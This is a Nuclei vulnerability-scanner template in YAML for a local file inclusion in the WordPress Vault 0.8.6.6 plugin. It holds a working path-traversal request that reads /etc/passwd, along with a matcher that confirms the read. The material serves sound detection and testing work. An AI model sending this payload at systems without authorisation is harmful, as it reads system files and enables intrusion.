nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml

33 lines
752 B
YAML
Raw Normal View History

2021-07-03 09:51:16 +00:00
id: wp-vault-local-file-inclusion
info:
name: WordPress Vault 0.8.6.6 - Local File Inclusion
2021-07-03 09:51:16 +00:00
author: 0x_Akoko
severity: high
description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/40850
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: lfi,edb,wp-plugin,wordpress
2021-07-03 09:51:16 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-03 09:51:16 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29